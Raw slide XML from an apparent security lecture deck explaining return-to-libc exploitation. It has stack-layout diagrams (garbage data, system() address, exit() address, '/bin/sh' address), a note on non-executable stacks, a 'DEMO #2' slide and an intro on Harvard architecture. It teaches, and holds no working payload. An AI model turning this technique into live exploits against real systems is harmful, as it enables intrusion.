              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>() returns, it will point here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="463" name="Shape 463"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2783488" x="6879000"/>
            <a:ext cy="2682600" cx="1807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a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>garbage data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>garbage data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>garbage data</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>system() addr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>exit() addr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>/bin/sh addr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="464" name="Shape 464"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3312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65" name="Shape 465"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3693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66" name="Shape 466"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4074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67" name="Shape 467"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="45315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68" name="Shape 468"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4988775" x="6881325"/>
            <a:ext cy="0" cx="1819500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="469" name="Shape 469"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2484275" x="7336200"/>
            <a:ext cy="256500" cx="1376100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>THE STACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="470" name="Shape 470"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off y="4793625" x="6053225"/>
            <a:ext cy="1037999" cx="839700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="471" name="Shape 471"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2135150" x="6659725"/>
            <a:ext cy="886500" cx="349799"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="472" name="Shape 472"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1649975" x="5913275"/>
            <a:ext cy="489899" cx="1784399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>not NOP's cause not executable!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="473" name="Shape 473"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off y="4445249" x="7469975"/>
            <a:ext cy="1364699" cx="1667699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>12 bytes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="474" name="Shape 474"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="55867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HIGH MEMORY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="475" name="Shape 475"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="22339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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="480" name="Shape 480"/>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Inside system()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="481" name="Shape 481"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1704688" x="457200"/>
            <a:ext cy="4840199" cx="8229600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> system(const char *command)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="482" name="Shape 482"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2783488" x="6879000"/>
            <a:ext cy="2682600" cx="1807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a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>....</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>exit() addr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>/bin/sh addr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="483" name="Shape 483"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3312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84" name="Shape 484"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3693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85" name="Shape 485"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="40743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86" name="Shape 486"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4531575" x="6881325"/>
            <a:ext cy="0" cx="1819500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="487" name="Shape 487"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4988775" x="6881325"/>
            <a:ext cy="0" cx="1819500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="488" name="Shape 488"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2484275" x="7336200"/>
            <a:ext cy="256500" cx="1376100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>THE STACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="489" name="Shape 489"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4222100" x="5645025"/>
            <a:ext cy="513300" cx="1236299"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="490" name="Shape 490"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3908937" x="4805275"/>
            <a:ext cy="431700" cx="1726199"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>RET Value</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="491" name="Shape 491"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off y="5225024" x="5866625"/>
            <a:ext cy="326700" cx="1014600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="492" name="Shape 492"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5335550" x="4835600"/>
            <a:ext cy="384899" cx="1516200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>argument 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="493" name="Shape 493"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5586700" x="6904650"/>
            <a:ext cy="326700" cx="1574700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>HIGH MEMORY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="494" name="Shape 494"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2233900" x="6904650"/>
            <a:ext cy="326700" cx="1574700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>LOW MEMORY</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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="499" name="Shape 499"/>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DEMO #2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="500" name="Shape 500"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3600451" x="685800"/>
            <a:ext cy="900599" cx="6400799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>return to lib c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Goto slides @ the end to see walkthroughs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Exploitation Theory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Shape 109"/>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u="sng" b="1" lang="en"/>
              <a:t>Harvard architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-342900" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Uncommon-&gt;Common</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-342900" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>made sense back in the tape/card days...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-342900" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Now AVR micro controllers..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="3" indent="-342900" marL="1828800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Arduino, ARM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-342900" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>physically separates data and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-342900" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>entirely different address</a:t>
            </a:r>
            <a:br>
